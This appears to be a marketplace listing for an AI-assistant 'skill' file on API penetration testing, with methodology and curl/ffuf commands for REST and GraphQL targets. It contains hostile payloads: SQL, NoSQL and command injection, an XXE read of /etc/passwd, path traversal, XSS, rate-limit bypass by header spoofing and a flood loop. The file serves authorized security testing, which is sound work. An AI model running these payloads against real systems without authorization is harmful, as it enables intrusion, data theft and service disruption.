0X6C7879/api-security-testing
skills/api-security-testing/SKILL.md
Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.
$ install --global
skillsauthnpx skillsauth add 0X6C7879/aegissec api-security-testingInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 22, 2026, 4:41 AM147.0s1 file scanned
SKILL.md
- name:
- api-security-testing
- description:
- Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.
API Security Testing Skill
You are an API security expert specializing in REST, GraphQL, and API pentesting. Use this skill when the user requests help with:
- REST API security testing
- GraphQL API exploitation
- API authentication bypass
- API authorization flaws
- Rate limiting bypass
- API fuzzing
- Mass assignment vulnerabilities
- API documentation discovery
Core Methodologies
1. API Discovery and Reconnaissance
Find API Endpoints:
# Common API paths
/api/
/api/v1/
/api/v2/
/rest/
/graphql
/swagger
/api-docs
/swagger.json
/swagger.yaml
/openapi.json
/api/swagger-ui/
/api/docs
# Directory fuzzing for APIs
ffuf -u https://target.com/FUZZ -w api-wordlist.txt -mc 200,301,302,403
gobuster dir -u https://target.com -w api-paths.txt
# JavaScript analysis
# Extract API endpoints from JS files
cat app.js | grep -Eo "(GET|POST|PUT|DELETE|PATCH)\s+['\"]([^'\"]+)"
API Documentation:
# Swagger/OpenAPI
curl https://target.com/swagger.json
curl https://target.com/v2/swagger.json
curl https://target.com/api-docs
# Check for exposed docs
https://target.com/docs
https://target.com/api/docs
https://target.com/swagger-ui/
https://target.com/redoc
Subdomain Enumeration for APIs:
# Common API subdomains
api.target.com
api-dev.target.com
api-staging.target.com
api-prod.target.com
rest.target.com
graphql.target.com
# Subdomain fuzzing
ffuf -u https://FUZZ.target.com -w subdomains.txt
2. REST API Testing
HTTP Methods Testing:
# Check all HTTP methods
curl -X GET https://api.target.com/users/1
curl -X POST https://api.target.com/users
curl -X PUT https://api.target.com/users/1
curl -X DELETE https://api.target.com/users/1
curl -X PATCH https://api.target.com/users/1
curl -X HEAD https://api.target.com/users/1
curl -X OPTIONS https://api.target.com/users/1
# Check for method override
curl -X POST https://api.target.com/users/1 -H "X-HTTP-Method-Override: DELETE"
curl -X POST https://api.target.com/users/1 -H "X-Method-Override: PUT"
Authentication Testing:
# No authentication
curl https://api.target.com/users
# Bearer token
curl https://api.target.com/users -H "Authorization: Bearer TOKEN"
# Basic auth
curl -u username:password https://api.target.com/users
# API key
curl https://api.target.com/users?api_key=KEY
curl https://api.target.com/users -H "X-API-Key: KEY"
# JWT token
curl https://api.target.com/users -H "Authorization: Bearer eyJhbGc..."
IDOR (Insecure Direct Object Reference):
# Test sequential IDs
curl https://api.target.com/users/1
curl https://api.target.com/users/2
curl https://api.target.com/users/100
# Test UUIDs
curl https://api.target.com/users/550e8400-e29b-41d4-a716-446655440000
# Test with different users
# User A's token accessing User B's data
curl https://api.target.com/users/2 -H "Authorization: Bearer USER_A_TOKEN"
Mass Assignment:
# Modify request to include unexpected fields
# Original: {"username":"test","email":"[email protected]"}
# Modified: {"username":"test","email":"[email protected]","role":"admin","is_admin":true}
curl -X POST https://api.target.com/users \
-H "Content-Type: application/json" \
-d '{"username":"hacker","email":"[email protected]","role":"admin","is_admin":true}'
# Common fields to try
# role, is_admin, admin, user_level, permissions, credits, balance
Excessive Data Exposure:
# Check response for sensitive data
curl https://api.target.com/users | jq
# Look for:
# - Password hashes
# - Internal IDs
# - Email addresses
# - API keys
# - Tokens
# - PII
3. GraphQL API Testing
GraphQL Discovery:
# Common GraphQL endpoints
/graphql
/graphql/console
/graphql/graphiql
/graphiql
/api/graphql
/v1/graphql
# Introspection query (check if enabled)
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name } } }"}'
GraphQL Introspection:
# Full introspection query
{
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
# Query specific type
{
__type(name: "User") {
name
fields {
name
type {
name
}
}
}
}
GraphQL Queries:
# Basic query
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ users { id username email } }"}'
# Query with variables
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query($id: Int!) { user(id: $id) { username email } }","variables":{"id":1}}'
# Mutation
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"mutation { updateUser(id: 1, role: \"admin\") { id role } }"}'
GraphQL Vulnerabilities:
# Test for IDOR
{"query":"{ user(id: 2) { id email password } }"}
# Test for mass assignment
{"query":"mutation { updateUser(id: 1, role: \"admin\", isAdmin: true) }"}
# Batch queries (DoS potential)
{"query":"{ user1: user(id: 1) { id } user2: user(id: 2) { id } ... }"}
# Deep nested queries (DoS)
{"query":"{ user { posts { comments { user { posts { comments { ... } } } } } }"}
# Alias abuse
{"query":"{ a: users { id } b: users { id } c: users { id } ... }"}
4. Authorization Testing
Horizontal Privilege Escalation:
# User A trying to access User B's resources
# Get User A's token
TOKEN_A=$(curl -X POST https://api.target.com/login -d '{"username":"userA","password":"passA"}' | jq -r .token)
# Try to access User B's data with User A's token
curl https://api.target.com/users/2 -H "Authorization: Bearer $TOKEN_A"
curl https://api.target.com/users/2/orders -H "Authorization: Bearer $TOKEN_A"
Vertical Privilege Escalation:
# Regular user trying to access admin functions
# Get regular user token
TOKEN_USER=$(curl -X POST https://api.target.com/login -d '{"username":"user","password":"pass"}' | jq -r .token)
# Try admin endpoints
curl https://api.target.com/admin/users -H "Authorization: Bearer $TOKEN_USER"
curl -X DELETE https://api.target.com/admin/users/1 -H "Authorization: Bearer $TOKEN_USER"
Function Level Authorization:
# Test all endpoints with different user roles
# - Unauthenticated
# - Low-privilege user
# - Medium-privilege user
# - Admin user
# Endpoints to test
GET /api/admin/*
POST /api/admin/*
DELETE /api/admin/*
PUT /api/admin/*
5. Rate Limiting and DoS
Test Rate Limits:
# Rapid requests
for i in {1..1000}; do
curl https://api.target.com/expensive-endpoint &
done
# Check response headers
curl -I https://api.target.com/endpoint
# Look for:
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# Retry-After
Rate Limit Bypass:
# Change IP (X-Forwarded-For, X-Real-IP)
curl https://api.target.com/endpoint -H "X-Forwarded-For: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Real-IP: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Originating-IP: 1.2.3.4"
# Change User-Agent
curl https://api.target.com/endpoint -H "User-Agent: Different-Agent"
# Add junk parameters
curl https://api.target.com/endpoint?random=123
curl https://api.target.com/endpoint?random=456
# Case manipulation
curl https://api.target.com/Endpoint
curl https://api.target.com/ENDPOINT
6. API Fuzzing
Parameter Fuzzing:
# ffuf for parameter discovery
ffuf -u https://api.target.com/endpoint?FUZZ=test -w parameters.txt
# Arjun
arjun -u https://api.target.com/endpoint
# Test various inputs
curl https://api.target.com/users?id=1
curl https://api.target.com/users?id=../../etc/passwd
curl https://api.target.com/users?id=<script>alert(1)</script>
curl https://api.target.com/users?id=' OR '1'='1
Fuzzing with wfuzz:
# POST data fuzzing
wfuzz -z file,wordlist.txt -d "username=FUZZ&password=test" https://api.target.com/login
# Header fuzzing
wfuzz -z file,wordlist.txt -H "X-Custom-Header: FUZZ" https://api.target.com/endpoint
Content-Type Confusion:
# Try different content types
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"user":"admin"}'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<user>admin</user>'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'user=admin'
# Send JSON to XML endpoint and vice versa
7. API Security Tools
Burp Suite:
# Send requests to Repeater for manual testing
# Use Intruder for fuzzing
# Scan with active/passive scanner
# Use extensions: Autorize, AuthMatrix, JWT4B
Postman:
# Import API collection
# Test all endpoints
# Use environment variables for tokens
# Create test scripts
# Export collection for collaboration
OWASP ZAP:
# Automated API scan
zap-cli quick-scan https://api.target.com
# Spider API
zap-cli spider https://api.target.com
# Active scan
zap-cli active-scan https://api.target.com
API-specific Tools:
# RESTler (Microsoft) - REST API fuzzer
git clone https://github.com/microsoft/restler-fuzzer
python3 restler.py --api_spec swagger.json
# Kiterunner - API endpoint discovery
kr scan https://target.com -w routes.txt
# Nuclei with API templates
nuclei -u https://api.target.com -t ~/nuclei-templates/api/
8. API Injection Attacks
SQL Injection:
# In query parameters
curl "https://api.target.com/users?id=1' OR '1'='1"
curl "https://api.target.com/users?id=1 UNION SELECT password FROM admin--"
# In JSON body
curl -X POST https://api.target.com/search \
-H "Content-Type: application/json" \
-d '{"query":"test\' OR \'1\'=\'1"}'
Command Injection:
# In parameters
curl "https://api.target.com/ping?host=8.8.8.8;whoami"
curl "https://api.target.com/ping?host=8.8.8.8|id"
# In JSON
curl -X POST https://api.target.com/diagnostic \
-H "Content-Type: application/json" \
-d '{"command":"ping;whoami"}'
NoSQL Injection:
# MongoDB injection
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":{"$ne":null},"password":{"$ne":null}}'
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":{"$regex":".*"}}'
XXE in XML APIs:
# If API accepts XML
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user><name>&xxe;</name></user>'
9. API Documentation Analysis
Swagger/OpenAPI Analysis:
# Download spec
curl https://api.target.com/swagger.json > swagger.json
# Analyze with jq
cat swagger.json | jq '.paths'
cat swagger.json | jq '.definitions'
# Extract all endpoints
cat swagger.json | jq -r '.paths | keys[]'
# Find parameters
cat swagger.json | jq '.paths[].get.parameters'
10. API Security Checklist
Authentication:
- [ ] Test without authentication
- [ ] Test with invalid tokens
- [ ] Test with expired tokens
- [ ] Test token in URL vs header
- [ ] Check for authentication bypass
Authorization:
- [ ] Test IDOR vulnerabilities
- [ ] Test horizontal privilege escalation
- [ ] Test vertical privilege escalation
- [ ] Test function-level authorization
- [ ] Test missing authorization checks
Input Validation:
- [ ] Test SQL injection
- [ ] Test NoSQL injection
- [ ] Test command injection
- [ ] Test XXE
- [ ] Test XSS in API responses
Business Logic:
- [ ] Test mass assignment
- [ ] Test excessive data exposure
- [ ] Test rate limiting
- [ ] Test resource exhaustion
- [ ] Test business logic flaws
Configuration:
- [ ] Check for exposed documentation
- [ ] Check security headers
- [ ] Check CORS configuration
- [ ] Check error messages (info disclosure)
- [ ] Check debug endpoints
Quick Testing Commands
Test Endpoint:
# GET request
curl -v https://api.target.com/endpoint
# POST with JSON
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"key":"value"}'
# With authentication
curl https://api.target.com/endpoint \
-H "Authorization: Bearer TOKEN"
# See full response
curl -i https://api.target.com/endpoint
Troubleshooting
CORS Issues:
# Check CORS headers
curl -H "Origin: https://evil.com" https://api.target.com/endpoint
# Look for:
# Access-Control-Allow-Origin: *
# Access-Control-Allow-Credentials: true
Rate Limited:
# Add delays between requests
for i in {1..100}; do curl https://api.target.com/endpoint; sleep 1; done
# Try bypass techniques (X-Forwarded-For, etc.)
Reference Links
- OWASP API Security Top 10: https://owasp.org/www-project-api-security/
- HackTricks API Testing: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql
- API Security Best Practices: https://github.com/OWASP/API-Security
- PayloadsAllTheThings API: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks
When to Use This Skill
Activate this skill when the user asks to:
- Test REST or GraphQL APIs
- Find API vulnerabilities
- Bypass API authentication/authorization
- Discover API endpoints
- Test API business logic
- Perform API fuzzing
- Analyze API documentation
- Help with API penetration testing
Always ensure proper authorization before testing any API.
Related Skills
0X6C7879/wooyun-legacy
development
VerifiedTrustedCommunity
WooYun-derived business-logic testing methodology for web apps and APIs. Use when the request involves 支付、退款、订单、越权、认证、授权、价格篡改或业务流程绕过 review, especially black-box probing for price tampering, account takeover, and process bypass flaws.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/windows-privilege-escalation
tools
VerifiedTrustedCommunity
Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/tunnel
development
VerifiedTrustedCommunity
Use when performing AD pentest tunneling and pivoting, especially with Ligolo-ng, Chisel, frp, proxychains, SSH forwarding, SOCKS relays, reverse tunnels, or when internal reachability is the main blocker.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/threat-modeling
development
VerifiedTrustedCommunity
Threat model, security audit, find vulnerabilities, check security of my app, risk assessment, penetration test prep, analyze attack surface, what could an attacker exploit. Use this skill whenever a user wants holistic security analysis of a codebase, application, or project. MUST be invoked instead of analyzing security yourself — it runs a specialized 8-phase STRIDE workflow producing professional deliverables you cannot generate alone: risk assessment reports, DFD diagrams, threat inventories, attack path validation, mitigation plans, and pentest plans. Trigger on: 威胁建模, 安全评估, 渗透测试, 安全分析, 安全审计, 安全检查, 风险评估. NOT for: fixing one specific bug, adding one security feature (rate limiting, CORS), writing tests, CI/CD setup, or debugging errors.
2SKILL.mdUpdated Apr 22, 2026